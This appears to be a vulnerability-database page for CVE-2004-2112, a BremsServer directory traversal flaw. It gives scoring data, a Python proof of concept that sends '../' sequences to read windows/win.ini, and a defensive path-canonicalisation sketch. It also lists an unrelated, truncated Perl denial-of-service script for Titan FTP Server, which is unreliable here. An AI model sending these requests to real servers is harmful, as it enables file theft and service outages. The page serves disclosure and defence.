CVE-2004-2112
Published 2004-12-31
CVE-2004-2112: Directory traversal vulnerability in BremsServer 1.2.4 allows remote attackers to read arbitrary files via ".." (dot dot) sequences in the URL.
Priority: P4 (29), medium, CVSS 2.0 score 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 3.59% (88.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| herberlin | bremsserver | — | — |
No detection rules found.
Exploit-DB
Titan FTP Server 3.0 - 'LIST' Denial of Service
exploitdb·2004-05-04
CVE-2004-0437 Titan FTP Server 3.0 - 'LIST' Denial of Service
---
source: https://www.securityfocus.com/bid/10272/info
Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.
A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.
```perl
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
use IO::Socket;

$host = "192.168.1.243";
my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i] ; $i++)
{
    print "Combination: $i\n";
    $remote = IO::Socket::INET->new ( Proto => "tcp",
        PeerAddr => $host,
        PeerPort => "2112",
    );
    unless ($remote) { die "cannot connect to ftp daemon on $host" }
    print "connected\n";

    # Read the server greeting until the 220 banner line arrives
    while (<$remote>)
    {
        print $_;
        if (/220 /)
        {
            last;
        }
    }
    $remote->autoflush(1);
    my $ftp = "USER
```
Exploit-DB
herberlin bremsserver 1.2.4/3.0 - Directory Traversal
exploitdb·2004-01-26
CVE-2004-2112 herberlin bremsserver 1.2.4/3.0 - Directory Traversal
---
source: https://www.securityfocus.com/bid/9493/info
Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.
BremsServer 3.0 is vulnerable; other versions may also be affected.
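```python
# --PoC--
# Python 2 syntax, as published
import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
# Sixteen "../" segments climb out of the web root before naming the target file
s.send('GET /' + '../' * 16 + 'windows/win.ini HTTP/1.1\r\n'
       'Host: localhost\r\n\r\n')
print s.recv(8192)
```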
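
The advisory attributes the flaw to a failure to validate user-specified URI input. The following is an added example, not code from BremsServer or from the original advisory: a Python 3 sketch of the server-side check that refuses such requests by canonicalising the path before any file is opened. The names `resolve_under_root`, `TraversalError`, `classify` and `SAMPLE_PATHS` are hypothetical, the sample paths are constructed, and the check goes beyond the plain `../` case on this page by also covering percent-encoded dots and backslash separators.

```python
import os
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a request path resolves outside the document root."""


def resolve_under_root(doc_root, url_path):
    """Map a request path to a file path, refusing anything outside doc_root."""
    # Only the path component selects a file; drop query string and fragment.
    path = url_path.split("?", 1)[0].split("#", 1)[0]
    # Decode once, so %2e%2e and %2f are checked as the characters they become.
    path = unquote(path)
    if "\x00" in path:
        raise TraversalError("NUL byte in path")
    # Windows accepts both separators, so treat backslash as a slash.
    path = path.replace("\\", "/")
    root = os.path.realpath(doc_root)
    # Join under the root, then canonicalise: collapses ".." and follows symlinks.
    candidate = os.path.realpath(os.path.join(root, path.lstrip("/")))
    # Compare canonical paths; a string prefix test would accept "/srv/www-old".
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError("path escapes document root: %r" % url_path)
    return candidate


# Constructed request paths; the second has the shape of the request above.
SAMPLE_PATHS = [
    "/index.html",
    "/" + "../" * 16 + "windows/win.ini",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/..\\..\\windows\\win.ini",
    "/docs/../index.html",
]


def classify(doc_root, paths):
    """Return {path: True if it would be served, False if refused}."""
    result = {}
    for p in paths:
        try:
            resolve_under_root(doc_root, p)
            result[p] = True
        except TraversalError:
            result[p] = False
    return result
```
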
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107513747107031&w=2
http://secunia.com/advisories/10731
http://www.osvdb.org/3755
http://www.securityfocus.com/bid/9493
http://www.securitytracker.com/id?1008853
https://exchange.xforce.ibmcloud.com/vulnerabilities/14954